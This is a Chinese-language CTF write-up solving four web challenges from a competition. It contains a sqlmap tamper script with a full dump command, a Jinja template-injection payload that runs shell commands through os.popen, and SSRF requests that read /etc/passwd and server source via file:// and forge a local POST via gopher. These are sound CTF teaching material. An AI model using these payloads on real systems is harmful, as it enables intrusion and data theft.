湖湘杯web

1、Code Check WEB

查看地下的公告,然后发现news目录有目录遍历,下载源码,然后list.php中的简单注入。
按照decode函数写出encode函数

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
< ?php header('content-type:text/html;charset=utf-8');
// require_once '../config.php';
//解密过程
function decode($data) {
$td = mcrypt_module_open(MCRYPT_RIJNDAEL_128, '', MCRYPT_MODE_CBC, '');
mcrypt_generic_init($td, 'ydhaqPQnexoaDuW3', '2018201920202021');
$data = mdecrypt_generic($td, base64_decode(base64_decode($data)));
mcrypt_generic_deinit($td);
mcrypt_module_close($td);
if (substr(trim($data), -7) !== 'hxb2018') {
echo '<script>window.location.href="/index.php";</script>';
} else {
return substr(trim($data), 0, strlen(trim($data)) - 7);
}
}
function encode($data) {
$td = mcrypt_module_open(MCRYPT_RIJNDAEL_128, '', MCRYPT_MODE_CBC, '');
mcrypt_generic_init($td, 'ydhaqPQnexoaDuW3', '2018201920202021');
$data = $data.'hxb2018';
$data = mcrypt_generic($td, $data);
$data = base64_encode(base64_encode($data));
return $data;
}
echo encode($_POST['data']);
// $id=decode($_GET['id']);
// $sql="select id,title,content,time from notice where id=$id";
// echo $sql;
// $info=$link->query($sql);
// $arr=$info->fetch_assoc();
? >

写个sqlmap的tamper,如下:

1
2
3
4
5
6
7
8
9
10
#!/usr/bin/env python
from lib.core.enums import PRIORITY
import re
__priority__ = PRIORITY.LOWEST
def dependencies():
pass
def tamper(payload, **kwargs):
import requests
r = requests.post('http://myhack.com/list.php', data={"data":payload})
return r.content

然后,sqlmap加上tamper直接跑:

python sqlmap.py -u "http://47.107.164.116:49882/news/list.php?id=b3FCRU5iOU9IemZYc1JQSkY0WG5JZz09" --tamper tamper/1.py --batch --tech=U -D mozhe_discuz_stormgroup --dump

2、WEB XmeO

47.107.238.175:9990

注册登录进去后,发现添加todo list那里存在模板注入。

1
{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].eval("__import__('os').popen('grep -r hxb /home/XmeO/').read()") }}{% endif %}{% endfor %}

成功读到flag

3、WEB Readflag

1
Binary file /home/XmeO/test.db matches /home/XmeO/auto.js: 'value' : 'hxb2018{163cad86dfd1cc8027cb6e5ebd1245d0}'

url参数发现可以用file协议,读了下/etc/passwd

然后,尝试读取apache的网站配置文件

http://47.107.238.3/?url=file:///etc/apache2/sites-available/000-default.conf

容易看到源码位置

/var/www/html/ssrf/web.php

读取源码

http://47.107.238.3/?url=file:///var/www/html/ssrf/web.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
< ?php
if (!isset($_GET['url'])) {
echo "ssrf me with parameter 'url'";
}
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $_GET['url']);
//echo $_GET['url'];
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);#curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
echo curl_exec($ch);
curl_close($ch);
//var_dump($_POST);
$ip = $_SERVER['REMOTE_ADDR'];
if (isset($_POST['user'])) {
if ($_POST['user'] == "admin" && $ip == "127.0.0.1") {
system("/var/www/html/ssrf/readflag");
}
}
? >

看到有个readflag文件,读取下来

1
http://47.107.238.3/?url=file:/var/www/html/ssrf/readflag

逆向之

看到flag文件的位置

读取之

http://47.107.238.3/?url=file:///var/www/html/ssrf/flag

或者使用gopher协议

1
http://47.107.238.3/?url=gopher://127.0.0.1:80/_POST%20/web/ssrf.php HTTP/1.1%250d%250aHost:127.0.0.1%250d%250aContent-Type:application/x-www-form-urlencoded%250d%250aContent-Length:10%250d%250a%250d%250auser=admin

4、WEB MyNote

原题,遂,直接用payload解了。

构造payload

触发

解码,得到flag

总结

玩的开心!